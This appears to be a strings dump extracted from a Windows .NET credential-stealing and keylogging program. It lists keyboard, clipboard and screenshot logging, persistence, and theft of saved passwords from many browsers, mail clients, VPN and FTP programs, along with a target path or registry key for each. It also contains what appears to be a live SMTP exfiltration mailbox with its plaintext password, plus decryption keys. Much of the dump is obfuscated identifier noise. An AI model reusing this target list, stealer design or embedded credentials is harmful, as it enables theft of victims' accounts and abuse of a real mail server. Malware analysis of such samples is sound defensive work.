!This program cannot be run in DOS mode.
`.rsrc
@.reloc
com.apple.Safari
Unable to resolve HTTP prox
1SPS*
KDBM(*
v4.0.30319
#Strings
= V ` h n x
9 Q q
"*"."C"O"Z"j"
vlgtrbC520
H8Nt4rUB20
eMtvsp90
vN3bE0
GhmSqP0
Ktmz7muPv0
hJ2QXJaUBy0
$$method0x6000120-1
$$method0x6000191-1
$$method0x6000254-1
$$method0x6000105-1
$$method0x6000115-1
$$method0x600011a-1
$$method0x600008c-1
$$method0x600007d-1
$$method0x600011f-1
$$method0x600013f-1
$$method0x60000ff-1
LXIwuUgS11
aB4Bl61
HMACSHA1
otysTH1
VT_UI1
dZ1lamqztP1
KqzzR0piS1
IEnumerable`1
ICollection`1
IEnumerator`1
IList`1
CS$<>9__CachedAnonymousMethodDelegate1
7BLRMYtYf1
6Rj6zg1
get_Item1
00mPY1p1
NdqDH0Iy1
$$method0x6000254-2
$$method0x6000115-2
$$method0x60000ff-2
PfvArMdx02
HMACSHA512
Advapi32
kernel32
Microsoft.Win32
user32
ToUInt32
ReadInt32
ToInt32
GXFKKyAVU42
2x5skorx92
i0flMHIdqB2
DNA7K1C2
x9GT8D2
Pb7o9mpF2
VT_UI2
KeyValuePair`2
Dictionary`2
get_Item2
WIrn7bVIFu2
ZTXOE273
KpzfC93w2D3
Tuple`3
lmA9i3
get_Item3
UZoxHko3
v6kHMu3
F9Dgwx3
ytN4dAy3
ToUInt64
ReadInt64
ToInt64
DVIBQt1E4
K79FFb9EE4
ZIky89MrF4
VT_UI4
94FML4
lCBFVwKMU4
RMUChfgU4
fc5JgjMh4
CGsk4n4
bHCnhn4
ONaNt4
YIhTbfzCIz4
Srq4SfxY45
jSMwrnC55
5356fd20-acd2-43aa-8500-4456c5279c75
uWvG9kFE5
1P3xMAHr8F5
oJsBH5
VAjVZOEJ5
Ed53W4QL5
pqtr8b3Xg5
mtAwj3zxus5
Aq6VqsYt5
YMpS70Gx5
IS_TEXT_UNICODE_ASCII16
IS_TEXT_UNICODE_REVERSE_ASCII16
ToUInt16
ReadInt16
ToInt16
HMACSHA256
9bW5aZN6
tHSyZKt6
i1mi57
6ANbMy77
kmQKXCDWh97
zzICo5mP3F7
VaultGetItem_WIN7
4lwMuc7
Rpfhg7
jWM0t7
kKUBao18
dD96fBol38
LQJqS68
get_UTF8
ncg28IG8
VT_UI8
VaultGetItem_WIN8
yKUx4P8
FdARQP8
dka7NsU8
ILUGN5f8
vNCgym8
MAImKp8
N1emib69
yrYz0zC79
zYB8OpI9789
AOzDxAP9
vx07UV6iwY9
5PWWLcu9
<Module>
5Oq30A
LvVWDd23A
4ZG353A
RKnZzyYrYHA
KINGmg7rqHA
zERRttoBnXA
ULdDfA
T99omuWdvgA
oc3LhA
kHPAEjgarA
2lmj9B
BCRYPT_KEY_DATA_BLOB
VT_BLOB
Ci1VeYB
ndnnWhB
VE2Q8vxhsB
14mJi3C
HjoDZDDC
dK0ck9mEC
BCRYPT_KEY_DATA_BLOB_MAGIC
1vKjFekC
BG6cQcqktC
w8PcpQM9D
LLKHF_EXTENDED
LLKHF_INJECTED
PrZfh4pQGD
VT_CLSID
get_ID
set_ID
FileHandleID
fileHandleID
lpdwProcessID
processID
get_FormatID
set_FormatID
Lnb2MD
gIlGefynD
awjBLJwD
DUPLICATE_CLOSE_SOURCE
V64gnCE
1XRqPfmNqCE
BCRYPT_CHAINING_MODE
uTqhX2I5FE
AvWiOAKFE
VT_STORAGE
INVALID_HANDLE
VT_FILETIME
IS_TEXT_UNICODE_SIGNATURE
IS_TEXT_UNICODE_REVERSE_SIGNATURE
VT_DATE
IS_TEXT_UNICODE_DBCS_LEADBYTE
AkN02NUE
m7yD8bdE
jU7FLe5F
pSyO99F
ShOBDF
4YkxGY1G
BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG
R7VXZG
nXLu2H
MXoGv7H
ZlzJBH
STATUS_AUTH_TAG_MISMATCH
STATUS_INFO_LENGTH_MISMATCH
IS_TEXT_UNICODE_ODD_LENGTH
BCRYPT_AUTH_TAG_LENGTH
BCRYPT_OBJECT_LENGTH
IvYeaH
p0kKMfH
A90FWRwlH
ekDUqH
AiDhl8rugqH
iKIQoY5sH
hmKCJtH
PhFLHw71I
YcBSYaoFt2I
s7RD14I
get_ASCII
56XfX5pALI
wq88C4iI
xWlElI
VKG3QdjpnI
NpwffElVqI
r14oNzI
IFvRzI
gbDY1h7J
NNbuBdBJ
tjSclhjTKJ
mDBxxbyvKJ
MywTm2JbZJ
v6nTyxwDgJ
j0umqJ
hHgVeNxJ
c6MQcD8m7K
f5n2Qo7K
Os1SIRULK
IS_TEXT_UNICODE_UNICODE_MASK
IS_TEXT_UNICODE_NOT_UNICODE_MASK
IS_TEXT_UNICODE_REVERSE_MASK
IS_TEXT_UNICODE_NOT_ASCII_MASK
ZVyC2LIjfK
rZ3xB6NGlqK
24UKehGqT0L
VT_DECIMAL
2YgWDL
OrDQiEL
Lq87GrEL
3t94NxRPKL
VT_NULL
WH_KEYBOARD_LL
VT_BOOL
SmtpSSL
jr1EwTL
etJbVdkNeL
bMgVVQfL
7pIDBs9gL
MGbAMkL
W8BqjkqK0pL
bQDRzXHdvL
dUBLcwL
LBIDGS9p3M
p8SL9beyH6M
VT_VERSIONED_STREAM
VT_STREAM
BCRYPT_CHAIN_MODE_GCM
BCRYPT_AES_ALGORITHM
LgIgVM
XJSxWM
6OG70dM
cCpUCgM
WfYDhM
q66U8xanM
hVsi3M0qM
9iApBDM8azM
lxN9ij7g4N
iWQi6N
GhXZVDAN
7F4NDBBCN
dZ9kHN
BCRYPT_INIT_AUTH_MODE_INFO_VERSION
HC_ACTION
XCmijVSN
ZTyq0v8MaVN
LLKHF_ALTDOWN
WM_SYSKEYDOWN
WM_KEYDOWN
xrOHb7dN
upMx7GCO
TPzjCO
LVFKBvpEeEO
N09uGO
System.IO
MOsppLByTO
s0Y2FfeLNnO
xkAmB3P
BCRYPT_PAD_OAEP
qUFdkoWEP
WM_SYSKEYUP
WM_KEYUP
LLKHF_UP
CekaXlZP
Pof66mP
QwriyrKeL0Q
Y81R2Q
2xYtNwLCQ
eG7EuYDQ
drBe5rUQ
Att2qdqzOnQ
Tsf4vJ0sQ
ZORexxQ
pu5FGXDR
MS_PRIMITIVE_PROVIDER
VT_ERROR
VT_VECTOR
BeKr4KSR
VT_BSTR
VT_LPSTR
VT_LPWSTR
vqLxMYTR
aVkwUR
5yjizCbR
ZvGSFgR
CMek3hR
W7CGtkR
jluvf0KlDrR
z8D6GJscrR
V3jshSgzR
I6bL9r6BS
IS_TEXT_UNICODE_STATISTICS
IS_TEXT_UNICODE_REVERSE_STATISTICS
trgqiBgRGES
IS_TEXT_UNICODE_NULL_BYTES
IS_TEXT_UNICODE_CONTROLS
IS_TEXT_UNICODE_REVERSE_CONTROLS
IS_TEXT_UNICODE_ILLEGAL_CHARS
DUPLICATE_SAME_ACCESS
ERROR_SUCCESS
STATUS_SUCCESS
BCRYPT_PAD_PSS
v63yoSS
3LIeN6dZfS
oyo4tS
VT_UINT
VT_INT
YjWTkCEelT
HTREtT
UxyjEvhC8U
ANbTxFU
E10PkFNxKU
HVZAYM4NU
IOVxYU
SGtpJL0zYU
FTtSwbU
L1gRcU
m10sTMrU
UdCO6uU
get_IV
set_IV
m59QTV
WRhxUV
lFMa0W
fAWdSG9W
STATUS_BUFFER_OVERFLOW
VcCkLtOnXPW
c3XsPW
nOdAWTPRW
fqvaO1ic6SW
YgN2UW
h6sE9fK0HZW
dG991X
9kNKez69k8X
RN1QGX
iNsJqP7zKX
YWD21PX
Iw0X6l4VX
OkjVU3QbgX
AVkbFhX
GTiZibhX
0wDsAjX
OsFmnpX
Noz4svm73qX
nQrbZHKlwX
24Ly53Y
GUmorDAY
VT_ARRAY
DW1aSYRgAY
SXxBYOHY
VT_EMPTY
Yp4lnY
3q63s6xzpY
bD6zGx3Z
yqqOn5KZ
w7nVOZ
Z755HTVyPZ
5WTnugUZ
dKITdcZ
value__
H0OrsrJ0a
vKFgIyBZkCa
Hk5qk7QuQa
b2or3Ta
lSmzTa
mJQZNEeca
V5pvCzE4ga
7iMb38ja
get_Data
set_Data
cbData
ProtectedData
cbAuthData
pbAuthData
PropertyData
SetQuota
bi2EAb
PublicIpAddressGrab
7UxTx0cb
dkLtXcb
isna3tpTDib
5GcbTib
mscorlib
l7UQ5Wzmhjb
OEapUftE8c
d4N7ZINc
MjC7NMF3Qc
e9UHRc
System.Collections.Generic
Microsoft.VisualBasic
WndProc
HookProc
FromFileTimeUtc
qYHOfVTFuc
elKjMCd
get_Id
SchemaId
schemaId
pszAlgId
HookId
GetWindowThreadProcessId
processId
SchemaElementId
pbGMU4Nd
PageExecuteRead
OpenRead
FileMapRead
VirtualMemoryRead
CreateThread
lpcbNeeded
DomainExtended
SHA1Managed
RijndaelManaged
add_Changed
remove_Changed
get_LastModified
set_LastModified
_lastModified
Interlocked
set_Enabled
get_IsEnabled
set_IsEnabled
_enabled
Undefined
lpOverlapped
samDesired
add_Elapsed
get_LastAccessed
set_LastAccessed
_lastAccessed
get_Reserved
reserved
TorPid
activeWindowPid
pPackageSid
row_id
get_IsInvalid
get_Guid
vaultGuid
PcHwid
mzYjyIld
ygHhoJld
<ID>k__BackingField
<FormatID>k__BackingField
<Data>k__BackingField
<LastModified>k__BackingField
<IsEnabled>k__BackingField
<LastAccessed>k__BackingField
<Password>k__BackingField
<password>k__BackingField
<PropertyStorage>k__BackingField
<Name>k__BackingField
<FileName>k__BackingField
<ApplicationName>k__BackingField
<Username>k__BackingField
<username>k__BackingField
<Type>k__BackingField
<type>k__BackingField
<TypedPropertyValue>k__BackingField
<Size>k__BackingField
<IsRunning>k__BackingField
<Path>k__BackingField
<hostmask>k__BackingField
<Version>k__BackingField
<Application>k__BackingField
<Description>k__BackingField
<user>k__BackingField
<hoster>k__BackingField
<Tasks>k__BackingField
<objects>k__BackingField
<Accounts>k__BackingField
<Keys>k__BackingField
<Lenght>k__BackingField
<Host>k__BackingField
<GuidMasterKey>k__BackingField
GetField
TrimEnd
ReadToEnd
AppEnd
Append
get_Millisecond
GetUpperBound
GetLowerBound
set_Method
method
Clipboard
get_Password
set_Password
DomainPassword
SmtpPassword
get_password
set_password
taUQxBisd
NCOPId1ud
XupUyd
Jd8iwzd
TZukVFe
JY9mNQ7FcHe
L8mxHe
pbbSKOe
dxv5LUtxOe
vEL2UCgPe
CfvLTe
t6fc30xVe
pOxbRQkI0ce
Replace
IsNullOrWhiteSpace
DeleteBackspace
QueryDosDevice
hInstance
IdentityReference
Sequence
cbNonce
pbNonce
Resource
vkCode
wScanCode
scanCode
keyCode
set_Mode
FileMode
ShareMode
PaddingMode
CryptoStreamMode
CipherMode
SelectSingleNode
XmlNode
get_Unicode
get_BigEndianUnicode
IsTextUnicode
FromImage
SectionImage
get_PropertyStorage
set_PropertyStorage
SerializedPropertyStorage
SendMessage
MailMessage
BRhuffge
AddRange
CompareExchange
CredentialCache
SectionNoCache
EndInvoke
BeginInvoke
GetEnvironmentVariable
SetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
hSourceHandle
SafeHandle
GetModuleHandle
RuntimeTypeHandle
ReleaseHandle
CloseHandle
DuplicateHandle
CreateHandle
GetTypeFromHandle
hSourceProcessHandle
hTargetProcessHandle
lpTargetHandle
bInheritHandle
vaultHandle
activeWindowHandle
handle
Rectangle
ToSingle
CreateFile
hTemplateFile
DeleteFile
WriteFile
MoveFile
MapViewOfFile
UnmapViewOfFile
lastTitle
activeWindowTitle
lphModule
get_MainModule
ProcessModule
get_Name
set_Name
lpDeviceName
get_FileName
set_FileName
GetModuleFileName
lpExistingFileName
lpFileName
GetFileName
lpNewFileName
_fileName
get_ModuleName
lpModuleName
lpBaseName
baseName
lpValueName
StartupRegName
rootPathName
get_OSFullName
get_FullName
OperatingSystemName
get_ApplicationName
set_ApplicationName
StartupInstallationName
lpName
lpAppName
get_UserName
get_ComputerName
ThisComputerName
ProcessorName
get_ProcessName
processName
StartupEnvName
GetProcessesByName
lpKeyName
pszCredentialFriendlyName
StartupDirectoryName
GetDirectoryName
astable_name
item_name
Filename
filename
get_Username
set_Username
get_username
set_username
System.Net.Mime
DateTime
GetLastAccessTime
dwTime
AppendLine
get_NewLine
Combine
LocalMachine
Escape
Unescape
DataProtectionScope
get_Type
set_Type
set_MediaType
pszBlobType
GetFileType
MimeType
ValueType
LogType
SecurityProtocolType
GetType
ContentType
item_type
get_type
set_type
FileShare
Compare
System.Core
PtrToStructure
get_InvariantCulture
Capture
HttpWebResponse
GetResponse
Dispose
Reverse
X509Certificate
GenericCertificate
DomainCertificate
Create
KBDLLHookProcDelegate
MulticastDelegate
Terminate
PcState
GetKeyboardState
lpKeyState
GetKeyState
Delete
PageReadWrite
PageExecuteReadWrite
nNumberOfBytesToWrite
FileMapWrite
VirtualMemoryWrite
Remote
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
SecuritySafeCriticalAttribute
ExtensionAttribute
AssemblyFileVersionAttribute
FlagsAttribute
CompilationRelaxationsAttribute
ReliabilityContractAttribute
ParamArrayAttribute
RuntimeCompatibilityAttribute
SuppressUnmanagedCodeSecurityAttribute
set_UseShellExecute
FileMapExecute
ReadByte
ToByte
get_Value
HandleValue
TryGetValue
get_TypedPropertyValue
set_TypedPropertyValue
GetPropertyValue
set_KeepAlive
Remove
SectionReserve
get_Size
set_Size
dataSize
cbSize
get_StorageSize
lpFileSize
get_NameSize
volumeNameSize
nFileSystemNameSize
SQLDataTypeSize
get_StoreSize
get_ValueSize
get_HashSize
set_BlockSize
chunkSize
get_KeySize
Serialize
Deserialize
Initialize
Finalize
Synchronize
page_size
Resize
84oj3RaYAf
iu8gdLf
SizeOf
get_ItemOf
LastIndexOf
cchBuff
lastInputInf
QjND7g
v9iTPTIg
FykLmZ1xIg
get_Jpeg
MCTbVg0Vlg
7kSHVWmg
System.Threading
get_Padding
set_Padding
UTF8Encoding
encoding
System.Drawing.Imaging
get_IsRunning
set_IsRunning
CreateFileMapping
FromBase64String
ToBase64String
EscapeDataString
UnescapeDataString
lpReturnedString
GetPrivateProfileString
ToString
GetString
OctetString
BitString
Substring
System.Drawing
Wr2IPPFClpg
get_Msg
RoITnzwg
qfYIpr1DKxg
H9lV6h
ETvw2LeaBh
tbOi2Ch
ijlPwM7rUh
SmtpAttach
dwMaximumSizeHigh
dwFileOffsetHigh
ComputeHash
get_Path
set_Path
SystemAppdataPath
get_ExecutablePath
AsmFilePath
AppStartupFullPath
GetTempPath
GetFolderPath
lpTargetPath
StartupDirectoryPath
get_Width
get_Length
MaximumLength
dwMinLength
SystemInformationLength
ObjectInformationLength
set_MaxJsonLength
ReturnLength
maximumComponentLength
GetWindowTextLength
dwMaxLength
EndsWith
StartsWith
t7M7U5kl5i
ZkLcUWX716i
qxOEB0XS9i
Xyboc4gP3Ai
lNFzxqG2Wi
AjxrC7ji
K7zI6yJ3Hji
PtrToStringUni
StringToHGlobalUni
ezz1VuhoBoi
YNIzqi
hKCtti
7sOWvi
FMRWrY9j
hFlTPtieoaj
ycAOqdnBIgj
objrij
sgEpIx6k
4JRFvnqpX8k
o84oJk
FLBjmgI9Xk
KBximHPq7Zk
AsyncCallback
RemoteCertificateValidationCallback
get_ServerCertificateValidationCallback
set_ServerCertificateValidationCallback
callback
get_CapsLock
TransformFinalBlock
TransformBlock
w59uik
FfM63nk
idHook
_clipboardHook
_keyboardHook
get_hostmask
set_hostmask
fApQyk
lcKUe2l
AllocHGlobal
FreeHGlobal
Illegal
Marshal
NetworkCredential
Decimal
System.Security.Principal
set_Interval
ScreenInterval
KeyloggerInterval
Rijndael
cbLabel
pbLabel
System.Collections.ObjectModel
System.ComponentModel
EnableTorPanel
System.Net.Mail
Kernel32.dll
kernel32.dll
User32.dll
user32.dll
vaultcli.dll
psapi.dll
ntdll.dll
bcrypt.dll
System.Xml
0wkZml
set_IsBodyHtml
set_SecurityProtocol
Control
set_EnableSsl
5euXbr2m
AqmQAm
enj8X7Em
OnT9ZhEm
ncPmI6JFm
zWFUaWam
z1WZRsRVcam
FileStream
get_BaseStream
GetResponseStream
CryptoStream
MemoryStream
get_LParam
get_WParam
get_Param
lParam
wParam
get_Item
set_Item
VaultGetItem
vaultItem
OperatingSystem
HmacAlgorithm
SymmetricAlgorithm
phAlgorithm
KeyedHashAlgorithm
algorithm
Random
ICryptoTransform
Maximum
root_num
J9bCtrG1n
jlaAaY4n
1yZ4m1i7I6n
cLu90LhlSn
llR7Zn
NsszVgFNFZn
ToBoolean
IsLittleEndian
CopyFromScreen
get_PrimaryScreen
lpNumberOfBytesWritten
N0V1Bgn
X509Chain
ChangeClipboardChain
QhGKJuk8jn
WZiCdIVBomn
Extension
get_OSVersion
get_Version
set_Version
dwInfoVersion
get_Application
set_Application
get_Location
ObjectDataInformation
SystemRegistryQuotaInformation
SystemBasicInformation
ObjectBasicInformation
QueryLimitedInformation
SystemPerformanceInformation
SystemProcessorPerformanceInformation
SystemLookasideInformation
SystemHandleInformation
ObjectNameInformation
GetVolumeInformation
ObjectTypeInformation
ObjectAllInformation
NtQuerySystemInformation
SystemExceptionInformation
SystemProcessInformation
ObjectInformation
SetInformation
SystemInterruptInformation
SystemTimeOfDayInformation
QueryInformation
VirtualMemoryOperation
pszImplementation
System.Globalization
System.Web.Script.Serialization
System.Reflection
PropertyDataCollection
ValueCollection
MatchCollection
GroupCollection
ManagementObjectCollection
AttachmentCollection
KeyCollection
set_Position
CreationDisposition
get_ContentDisposition
SearchOption
Win32Exception
CryptographicException
ArgumentOutOfRangeException
ArgumentException
get_Description
set_Description
get_StatusDescription
_description
System.Runtime.ConstrainedExecution
StringComparison
add_KeyDown
remove_KeyDown
get_CtrlKeyDown
get_ShiftKeyDown
get_AltKeyDown
Unknown
cIKb9G2o
pNWiPh3o
TInwLo
CompareTo
CopyTo
aiZqao
lastInPutNfo
dwExtraInfo
ImageCodecInfo
FieldInfo
FileInfo
CultureInfo
pPaddingInfo
FileSystemInfo
MemberInfo
ComputerInfo
get_StartInfo
ProcessStartInfo
GetLastInputInfo
DirectoryInfo
DF4Yjo
jgMwtlto
O5zxPqBp
bRCpRiTxDp
gzxnUJp
add_KeyUp
remove_KeyUp
51JJwYp
dwNumberOfBytesToMap
Bitmap
TimeStamp
LocalApp
AppAddStartup
HideFileStartup
Q8jCQdbwp
sdpFgByp
OS3OArr0r8q
K201gjCq
ViMwWa2GRKq
System.Linq
nM59oAd4Psq
o4Pvdzq
llCHl70JU8r
HOLwCr
wd1U7110KMr
dSMAt1BtZr
OLiV1mgbar
ToChar
lpChar
DirectorySeparatorChar
ObjectTypeNumber
volumeSerialNumber
StreamReader
TextReader
BinaryReader
SHA1CryptoServiceProvider
MD5CryptoServiceProvider
RNGCryptoServiceProvider
TripleDESCryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
IFormatProvider
StringBuilder
SpecialFolder
SmtpSender
sender
Encoder
volumeNameBuffer
fileSystemNameBuffer
buffer
ServicePointManager
Integer
EnableClipboardLogger
EnableScreenLogger
_screenLogger
_keyLogger
EnableKeylogger
ManagementObjectSearcher
ObjectIdentifier
SecurityIdentifier
ElapsedEventHandler
LogTimer
ToUpper
CurrentUser
get_user
set_user
EncoderParameter
Object_Pointer
BitConverter
get_hoster
set_hoster
BinaryFormatter
SmtpReceiver
SmtpServer
SetClipboardViewer
ToLower
JavaScriptSerializer
uTMWVFxjr
get_Major
get_Minor
GetLastWin32Error
GetLastError
Authenticator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
RandomNumberGenerator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
OPoHF5L3sr
passwordVaultPtr
ReadIntPtr
SbTGiyr
tc0CNNrkHs
dKt8ARs
hJI6RN3PUs
427n9Ys
mKkIuZs
Graphics
System.Diagnostics
get_Bounds
GBaDG3cFes
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
GetInstances
get_ChildNodes
Matches
EnableCookies
GetDirectories
master_table_entries
get_Properties
ExpandEnvironmentVariables
GetFiles
EnumProcessModules
NumberStyles
GetSubKeyNames
field_names
ReadAllLines
GetProcesses
System.Security.Cryptography.X509Certificates
FlagsAndAttributes
lpFileMappingAttributes
SecurityAttributes
FileBytes
Rfc2898DeriveBytes
ReadAllBytes
BufferBytes
GetBytes
db_bytes
get_Values
GetLogicalDrives
fileSystemFlags
dwFlags
ElapsedEventArgs
get_Tasks
set_Tasks
ICredentials
set_Credentials
get_DefaultCredentials
set_UseDefaultCredentials
Equals
CreateParams
VaultEnumerateItems
System.Windows.Forms
Contains
System.Web.Extensions
System.Text.RegularExpressions
iterations
System.Collections
set_MaximumAutomaticRedirections
StringSplitOptions
RegexOptions
options
HhUSuYos
c70Ops
get_Groups
get_Chars
GetImageEncoders
System.Timers
RuntimeHelpers
EncoderParameters
SslPolicyErrors
SystemInformationClass
ObjectInformationClass
ManagementClass
dwDesiredAccess
GrantedAccess
FileAccess
FileMapAllAccess
processAccess
get_Success
CreateProcess
hProcess
OpenProcess
GetCurrentProcess
lpBaseAddress
MailAddress
PublicIpAddress
get_objects
set_objects
VaultEnumerateVaults
pPropertyElements
get_Attachments
set_Arguments
get_Accounts
set_Accounts
get_Exists
yIlHHHAxs
get_Keys
set_Keys
get_ModifierKeys
BW2JQ0t
SAHXOU0t
vJq2mjVGEt
7sVgIt
a4NVCPt
Concat
AppendFormat
ImageFormat
Subtract
VT_BLOB_Object
VT_STREAMED_Object
VT_STORED_Object
ManagementBaseObject
hFileMappingObject
hObject
ManagementObject
cbKeyObject
pbKeyObject
NtQueryObject
object
set_Subject
Collect
set_AllowAutoRedirect
flProtect
Unprotect
System.Net
offset
dRJX71Yht
get_Height
get_Lenght
set_Lenght
op_Explicit
SectionCommit
WaitForExit
cbSalt
VaultOpenVault
get_Default
lpDefault
pcbResult
IAsyncResult
phkResult
result
UnsignedInt
set_UserAgent
PublicUserAgent
SmtpClient
System.Management
pResourceElement
XmlElement
pAuthenticatorElement
pIdentityElement
dwIncrement
sql_statement
Attachment
Environment
XmlDocument
get_Parent
GetParent
get_Current
content
get_Count
get_HandleCount
get_TickCount
vaultItemCount
set_IterationCount
dwPropertiesCount
vaultCount
vqJpkpt
BCryptDecrypt
BCryptEncrypt
TrimStart
AppStart
Convert
set_Port
SmtpPort
UnsignedShort
HttpWebRequest
XmlNodeList
ToList
MozillaBrowserList
ChromiumBrowserList
get_Host
set_Host
ICredentialsByHost
set_Timeout
GetKeyboardLayout
dwLayout
cbInput
pbInput
cbOutput
pbOutput
get_StandardOutput
set_RedirectStandardOutput
MoveNext
System.Text
LastCopiedText
KeylogText
ReadAllText
AppendAllText
get_InnerText
GetText
GetWindowText
Log_text
cbMacContext
pbMacContext
lz43yt
fhKe6QjpoHu
RMJjUFku
INL6lZRZmu
2W1t9xCLw0v
MwRaBAv
gbantxAMv
xtiXAKMv
QDrWFlmQv
kRdXkhEiv
vVYElO7hiv
EH8Criv
p6cNwKvv
DOcBkvx7v1w
RDvrQKDw
sBMpxPw
sjJDxTMALaw
7GRFwS9fw
dwMaximumSizeLow
dwFileOffsetLow
get_Now
GetForegroundWindow
NativeWindow
set_CreateNoWindow
adbI45x
zYQPMHDx
az2E2BHEx
ToUnicodeEx
GetModuleFileNameEx
RegQueryValueEx
GetFileSizeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
MaximumEx
RegOpenKeyEx
uBBrz8CUx
CbDrEBZx
ucchMax
nu8d9dx
BufferEndIndex
BlockIndex
BufferStartIndex
J1e8nUnx
gPnSwWmsOzx
WIs21y
sQJeDY1v3y
smcI038rKy
qBhOSy
so5sApCzDay
ProtectedArray
ToByteArray
InitializeArray
ToArray
ToCharArray
Consistency
set_Body
get_Key
set_Key
OpenSubKey
subKey
RegCloseKey
get_GuidMasterKey
set_GuidMasterKey
_guidMasterKey
ContainsKey
wVirtKey
hImportKey
BCryptImportKey
BCryptDestroyKey
RegistryKey
_wsftpkey
K45z4gy
System.Security.Cryptography
oIb4mGsDly
GetExecutingAssembly
PageReadonly
Multiply
vA5XtD5my
PageWriteCopy
BlockCopy
FileMapCopy
System.Runtime.Serialization.Formatters.Binary
AmountOfMemory
get_TotalPhysicalMemory
Directory
Registry
2447B9p1osy
NvIKty
get_Capacity
Quality
op_Equality
op_Inequality
System.Security
System.Net.Security
Identity
IsNullOrEmpty
BCryptSetAlgorithmProperty
BCryptGetProperty
BCryptSetProperty
pszProperty
g5erZiMh0z
YSj90mAz
ciOXEz
bkwdVPn4hcz
T0xsgz
64jWGrz
WrapNonExceptionThrows
1.0.0.0
$242fbb54-1a07-4599-bce0-f334ebb8e168
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
p p p!p"p#p$p%p&p'p(p)p*p+p,p-p.p/p0p1p2p3p4p5p6p7p8p9p:p;p<p=p>p?p@pApDpEpFpGpHpKpfy|y
k#n+n9
4 5 6!7"8#9$:%;&<'=(>)?*@+A,B-C0D4E5F6G7H8I9K:N;O=QATD]FcJuPvTwVxYy]z`
BACAIHJHQPVUWUXU\[cbedfdgdhdidjdml
image/jpg
yyyy_MM_dd_HH_mm_ss
/log.tmp
yyyy-MM-dd HH:mm:ss
<br>User Name:
<br>CPU:
<br>RAM:
<br>Computer Name:
<br>OSFullName:
MM/dd/yyyy HH:mm:ss
IP Address:
Time:
Recovered!
Time:
OSFullName:
User Name:
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
irradia.com.bo
mflores@irradia.com.bo
8cMocb_&4trjd-5
bienvenidos@irradia.com.bo
appdata
system file
system file.exe
]</b> (
{KEYUP}
{ALT+F4}
{NumLock}
{Insert}
{ALT+TAB}
{KEYDOWN}
{PageUp}
{BACK}
{PageDown}
{CTRL}
control
{ENTER}
{KEYLEFT}
{KEYRIGHT}
{CAPSLOCK}
{HOME}
"
<br><hr>Copied Text: <br>
logins
IE/Edge
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
SchemaId
pResourceElement
pIdentityElement
pPackageSid
pAuthenticatorElement
UC Browser
UCBrowser\
Login Data
journal
wow_logins
Safari for Windows
\Common Files\Apple\Apple Application Support\plutil.exe
\Apple Computer\Preferences\keychain.plist
<string>
</string>
<data>
</data>
<dict>
<array>
-convert xml1 -s -o "
\fixed_keychain.xml"
\Microsoft\Credentials\
\Microsoft\Protect\
credential
QQ Browser
Profile
\Default\EncryptedStorage
Tencent\QQBrowser\User Data
\EncryptedStorage
entries
category
Password
password_value
IncrediMail
PopPassword
SmtpPassword
Software\IncrediMail\Identities\
\Accounts_New
SmtpServer
EmailAddress
Eudora
Software\Qualcomm\Eudora\CommandLine\
current
Settings
SavePasswordText
ReturnAddress
Falkon Browser
startProfile=([A-z0-9\/\.\"]+)
profiles.ini
\browsedata.db
autofill
\falkon\profiles\
ClawsMail
\clawsrc
\Claws-mail
passkey0
master_passphrase_salt=(.+)
master_passphrase_pbkdf2_rounds=(.+)
\accountrc
smtp_server
address
account
\passwordstorerc
{(.*),(.*)}(.*)
Flock Browser
APPDATA
\Flock\Browser\
signons3.txt
DynDns
ALLUSERSPROFILE
Dyn\Updater\config.dyndns
username=
password=
https://account.dyn.com/
t6KzXhCh
Dyn\Updater\daemon.cfg
global
accounts
account.
username
password
Psi/Psi+
\Psi+\profiles
\accounts.xml
\Psi\profiles
OpenVPN
Software\OpenVPN-GUI\configs
Software\OpenVPN-GUI\configs\
auth-data
entropy
remote
USERPROFILE
\OpenVPN\config\
NordVPN
NordVpn.exe*
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
Private Internet Access
%ProgramW6432%
Private Internet Access\data
\account.json
.*"username":"(.*?)"
.*"password":"(.*?)"
privateinternetaccess.com
ProgramFiles(x86)
\Private Internet Access\data
FileZilla
\FileZilla\recentservers.xml
<Server>
<Host>
</Host>
<Port>
</Port>
<User>
</User>
<Pass encoding="base64">
</Pass>
<Pass>
CoreFTP
SOFTWARE\FTPWare\COREFTP\Sites
hdfzpysvpzimorhk
WinSCP
SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
HostName
UserName
PublicKeyFile
PortNumber
[PRIVATE KEY LOCATION: "{0}"]
ABCDEF
Flash FXP
Sites.dat
\FlashFXP\
quick.dat
yA36zA48dEhfrvghGRg57h5UlDv3
FTP Navigator
No Password
SystemDrive
\FTP Navigator\Ftplist.txt
Server
SmartFTP
SmartFTP\Client 2.0\Favorites\Quick Connect
WS_FTP
Ipswitch\WS_FTP\Sites\ws_ftp.ini
FtpCommander
;Server=
;Port=
